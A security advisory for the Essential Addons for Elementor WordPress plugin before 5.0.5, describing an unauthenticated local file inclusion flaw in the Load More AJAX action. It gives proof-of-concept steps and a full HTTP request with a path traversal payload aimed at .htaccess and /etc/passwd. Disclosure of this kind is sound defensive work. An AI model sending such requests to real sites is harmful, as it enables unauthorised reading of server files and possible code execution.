Essential Addons for Elementor < 5.0.5 - Unauthenticated LFI

The plugin does not validate and sanitise some template data before it them in include statements, which could allow unauthenticated attackers to perform Local File Inclusion attack and read arbitrary files on the server, this could also lead to RCE via user uploaded files or other LFI to RCE techniques.

PoC

- Create a simple page and edit with Elementor - Add a Post Grid with the Show Load More option enabled (in the Layout Settings section of the widget, default is disabled) - As an unauthenticated user, navigate to that page and intercept the request made when clicking the Load More button - Change the template_info[file_name] parameter with a payload such as …/…/…/…/…/…/.htaccess, …/…/…/…/…/…/…/…/etc/passwd etc (the template_info[name] is also vulnerable) POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 396 Connection: close action=load_more&class;=Essential_Addons_Elementor%5CElements%5CPost_Grid&args;=orderby%3Ddate%26order%3Ddesc%26ignore_sticky_posts%3D1%26post_status%3Dpublish%26posts_per_page%3D4%26offset%3D0%26post_type%3Dpost&page;=2&page;_id=5512&widget;_id=19f1b2c&nonce;=7c9c8da06d&template;_info%5Bdir%5D=lite&template;_info%5Bfile_name%5D=…%2f…%2f…%2f…%2f…%2f…%2f.htaccess&template;_info%5Bname%5D=Post-Grid The ajax_eael_product_gallery AJAX action (Product Grid widget) is also affected